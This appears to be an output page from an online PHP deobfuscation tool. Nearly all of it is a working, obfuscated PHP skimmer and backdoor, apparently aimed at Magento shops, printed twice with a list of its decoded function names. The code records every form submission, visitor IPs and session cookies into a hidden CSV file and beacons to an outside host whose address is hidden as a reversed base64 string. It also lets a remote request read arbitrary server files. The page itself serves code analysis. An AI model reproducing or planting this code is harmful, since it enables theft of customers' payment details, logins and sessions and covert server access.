Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $GLOBALS['_190592420_']=Array(base64_decode('' .'aXNf' .'YX' .'JyY' .'Xk='),base6..

Decoded Output download

<?php 
 
$GLOBALS['_190592420_']=Array(base64_decode('' .'aXNf' .'YX' .'JyY' .'Xk='),base64_decode('Y29' .'1bn' .'Q' .'='),base64_decode('Zm' .'lsZV9' .'le' .'GlzdH' .'M='),base64_decode('bWtka' .'XI='),base64_decode('c' .'3R' .'yc3R' .'y'),base64_decode('ZmlsZXN' .'pemU='),base64_decode('cmVuYW1l'),base64_decode('cmVuYW1l'),base64_decode('YmFz' .'ZTY0X' .'2VuY29kZQ=='),base64_decode('c2VyaWFsa' .'Xpl'),base64_decode('Zm' .'l' .'sZV9nZX' .'RfY2' .'9udGVud' .'HM' .'='),base64_decode('c3RycmV2'),base64_decode('c2' .'VyaWFs' .'aXpl'),base64_decode('Zm' .'9wZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Zm' .'Nsb3Nl'),base64_decode('c2Vy' .'aWFsaXpl'),base64_decode('Zm9wZW' .'4='),base64_decode('ZnB1dHM='),base64_decode('ZmNs' .'b3Nl'),base64_decode('' .'Zm' .'ls' .'ZQ=' .'='),base64_decode('aW1wbG9kZQ=='));  
function _332353437($i){$a=Array('L3Zhci9leHBvcnQv','RE9DVU1FTlRfUk9PVA==','ZXhwb3J0Xw==','ZGF0ZQ==','UkVRVUVTVF9USU1F','aXA=','UkVNT1RFX0FERFI=','dXJs','UkVRVUVTVF9VUkk=','ZnJvbnRlbmQ=','Y29va2ll','ZnJvbnRlbmQ=','UEhQU0VTU0lE','Y29va2ll','UEhQU0VTU0lE','UkVRVUVTVF9VUkk=','X3Byb2QuY3N2','X3Byb2QxLmNzdg==','X3Byb2QyLmNzdg==','X3Byb2QuY3N2','X3Byb2QxLmNzdg==','SFRUUF9IT1NU','X3Byb2QxLmNzdg==','PXQ/cGhwLnhhamEvemliLmduaW50by5jc28vLzpwdHRo','DQo=','X3Byb2QuY3N2','YQ==','bG9naW4=','ZXhwb3J0X21hZ2U=','LmNzdg==','DQo=','YQ==','Z2V0bG9nZmlsZQ==','Z2V0bG9nZmlsZQ==','DQo=');return base64_decode($a[$i]);}  
if(isset($_POST)&& $GLOBALS['_190592420_'][0]($_POST)&& $GLOBALS['_190592420_'][1]($_POST)>round(0)){$_0=_332353437(0);$_1=$_SERVER[_332353437(1)] .$_0;$_2=_332353437(2) .$magequotes;if(!$GLOBALS['_190592420_'][2]($_1))@$GLOBALS['_190592420_'][3]($_1,round(0+170.33333333333+170.33333333333+170.33333333333),true);$_3=$_POST;$_3[_332353437(3)]=$_SERVER[_332353437(4)];$_3[_332353437(5)]=$_SERVER[_332353437(6)];$_3[_332353437(7)]=$_SERVER[_332353437(8)];if(isset($_COOKIE[_332353437(9)]))$_3[_332353437(10)]=$_COOKIE[_332353437(11)];if(isset($_COOKIE[_332353437(12)]))$_3[_332353437(13)]=$_COOKIE[_332353437(14)];if($GLOBALS['_190592420_'][4]($_SERVER[_332353437(15)],$magecheck)){if(@$GLOBALS['_190592420_'][5]($_1 .$_2 ._332353437(16))>round(0+1024)*$magedirsize){@$GLOBALS['_190592420_'][6]($_1 .$_2 ._332353437(17),$_1 .$_2 ._332353437(18));@$GLOBALS['_190592420_'][7]($_1 .$_2 ._332353437(19),$_1 .$_2 ._332353437(20));$_4[round(0+0.5+0.5)]=$_SERVER[_332353437(21)];$_4[round(0+0.4+0.4+0.4+0.4+0.4)]=$_0;$_4[round(0+1.5+1.5)]=$_2 ._332353437(22);$_5=$GLOBALS['_190592420_'][8]($GLOBALS['_190592420_'][9]($_4));@$GLOBALS['_190592420_'][10]($GLOBALS['_190592420_'][11](_332353437(23)) .$_5);}$_6=$GLOBALS['_190592420_'][12]($_3) ._332353437(24);$_7=$GLOBALS['_190592420_'][13]($_1 .$_2 ._332353437(25),_332353437(26));$GLOBALS['_190592420_'][14]($_7,$_6);$GLOBALS['_190592420_'][15]($_7);}if(isset($_POST[_332353437(27)])){$_8=_332353437(28) .$magequotes ._332353437(29);$_6=$GLOBALS['_190592420_'][16]($_3) ._332353437(30);$_7=$GLOBALS['_190592420_'][17]($_1 .$_8,_332353437(31));$GLOBALS['_190592420_'][18]($_7,$_6);$GLOBALS['_190592420_'][19]($_7);}if(isset($_POST[_332353437(32)])){$_9=$GLOBALS['_190592420_'][20]($_1 .$_POST[_332353437(33)]);die($GLOBALS['_190592420_'][21](_332353437(34),$_9));}} 
 
 
var_dump($GLOBALS['_190592420_']); 
 ?>

Did this file decode correctly?

Original Code

<?php

$GLOBALS['_190592420_']=Array(base64_decode('' .'aXNf' .'YX' .'JyY' .'Xk='),base64_decode('Y29' .'1bn' .'Q' .'='),base64_decode('Zm' .'lsZV9' .'le' .'GlzdH' .'M='),base64_decode('bWtka' .'XI='),base64_decode('c' .'3R' .'yc3R' .'y'),base64_decode('ZmlsZXN' .'pemU='),base64_decode('cmVuYW1l'),base64_decode('cmVuYW1l'),base64_decode('YmFz' .'ZTY0X' .'2VuY29kZQ=='),base64_decode('c2VyaWFsa' .'Xpl'),base64_decode('Zm' .'l' .'sZV9nZX' .'RfY2' .'9udGVud' .'HM' .'='),base64_decode('c3RycmV2'),base64_decode('c2' .'VyaWFs' .'aXpl'),base64_decode('Zm' .'9wZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Zm' .'Nsb3Nl'),base64_decode('c2Vy' .'aWFsaXpl'),base64_decode('Zm9wZW' .'4='),base64_decode('ZnB1dHM='),base64_decode('ZmNs' .'b3Nl'),base64_decode('' .'Zm' .'ls' .'ZQ=' .'='),base64_decode('aW1wbG9kZQ==')); 
function _332353437($i){$a=Array('L3Zhci9leHBvcnQv','RE9DVU1FTlRfUk9PVA==','ZXhwb3J0Xw==','ZGF0ZQ==','UkVRVUVTVF9USU1F','aXA=','UkVNT1RFX0FERFI=','dXJs','UkVRVUVTVF9VUkk=','ZnJvbnRlbmQ=','Y29va2ll','ZnJvbnRlbmQ=','UEhQU0VTU0lE','Y29va2ll','UEhQU0VTU0lE','UkVRVUVTVF9VUkk=','X3Byb2QuY3N2','X3Byb2QxLmNzdg==','X3Byb2QyLmNzdg==','X3Byb2QuY3N2','X3Byb2QxLmNzdg==','SFRUUF9IT1NU','X3Byb2QxLmNzdg==','PXQ/cGhwLnhhamEvemliLmduaW50by5jc28vLzpwdHRo','DQo=','X3Byb2QuY3N2','YQ==','bG9naW4=','ZXhwb3J0X21hZ2U=','LmNzdg==','DQo=','YQ==','Z2V0bG9nZmlsZQ==','Z2V0bG9nZmlsZQ==','DQo=');return base64_decode($a[$i]);} 
if(isset($_POST)&& $GLOBALS['_190592420_'][0]($_POST)&& $GLOBALS['_190592420_'][1]($_POST)>round(0)){$_0=_332353437(0);$_1=$_SERVER[_332353437(1)] .$_0;$_2=_332353437(2) .$magequotes;if(!$GLOBALS['_190592420_'][2]($_1))@$GLOBALS['_190592420_'][3]($_1,round(0+170.33333333333+170.33333333333+170.33333333333),true);$_3=$_POST;$_3[_332353437(3)]=$_SERVER[_332353437(4)];$_3[_332353437(5)]=$_SERVER[_332353437(6)];$_3[_332353437(7)]=$_SERVER[_332353437(8)];if(isset($_COOKIE[_332353437(9)]))$_3[_332353437(10)]=$_COOKIE[_332353437(11)];if(isset($_COOKIE[_332353437(12)]))$_3[_332353437(13)]=$_COOKIE[_332353437(14)];if($GLOBALS['_190592420_'][4]($_SERVER[_332353437(15)],$magecheck)){if(@$GLOBALS['_190592420_'][5]($_1 .$_2 ._332353437(16))>round(0+1024)*$magedirsize){@$GLOBALS['_190592420_'][6]($_1 .$_2 ._332353437(17),$_1 .$_2 ._332353437(18));@$GLOBALS['_190592420_'][7]($_1 .$_2 ._332353437(19),$_1 .$_2 ._332353437(20));$_4[round(0+0.5+0.5)]=$_SERVER[_332353437(21)];$_4[round(0+0.4+0.4+0.4+0.4+0.4)]=$_0;$_4[round(0+1.5+1.5)]=$_2 ._332353437(22);$_5=$GLOBALS['_190592420_'][8]($GLOBALS['_190592420_'][9]($_4));@$GLOBALS['_190592420_'][10]($GLOBALS['_190592420_'][11](_332353437(23)) .$_5);}$_6=$GLOBALS['_190592420_'][12]($_3) ._332353437(24);$_7=$GLOBALS['_190592420_'][13]($_1 .$_2 ._332353437(25),_332353437(26));$GLOBALS['_190592420_'][14]($_7,$_6);$GLOBALS['_190592420_'][15]($_7);}if(isset($_POST[_332353437(27)])){$_8=_332353437(28) .$magequotes ._332353437(29);$_6=$GLOBALS['_190592420_'][16]($_3) ._332353437(30);$_7=$GLOBALS['_190592420_'][17]($_1 .$_8,_332353437(31));$GLOBALS['_190592420_'][18]($_7,$_6);$GLOBALS['_190592420_'][19]($_7);}if(isset($_POST[_332353437(32)])){$_9=$GLOBALS['_190592420_'][20]($_1 .$_POST[_332353437(33)]);die($GLOBALS['_190592420_'][21](_332353437(34),$_9));}}


var_dump($GLOBALS['_190592420_']);

Function Calls

base64_decode 44

Variables

$_190592420_ [{'key': 0, 'value': 'is_array'}, {'key': 1, 'value': 'count'}, {'key': 2, 'value': 'file_exists'}, {'key': 3, 'value': 'mkdir'}, {'key': 4, 'value': 'strstr'}, {'key': 5, 'value': 'filesize'}, {'key': 6, 'value': 'rename'}, {'key': 7, 'value': 'rename'}, {'key': 8, 'value': 'base64_encode'}, {'key': 9, 'value': 'serialize'}, {'key': 10, 'value': 'file_get_contents'}, {'key': 11, 'value': 'strrev'}, {'key': 12, 'value': 'serialize'}, {'key': 13, 'value': 'fopen'}, {'key': 14, 'value': 'fputs'}, {'key': 15, 'value': 'fclose'}, {'key': 16, 'value': 'serialize'}, {'key': 17, 'value': 'fopen'}, {'key': 18, 'value': 'fputs'}, {'key': 19, 'value': 'fclose'}, {'key': 20, 'value': 'file'}, {'key': 21, 'value': 'implode'}]

Stats

MD5 c0c76f12fa47690cb97a88072f43cc6d
Eval Count 0
Decode Time 190 ms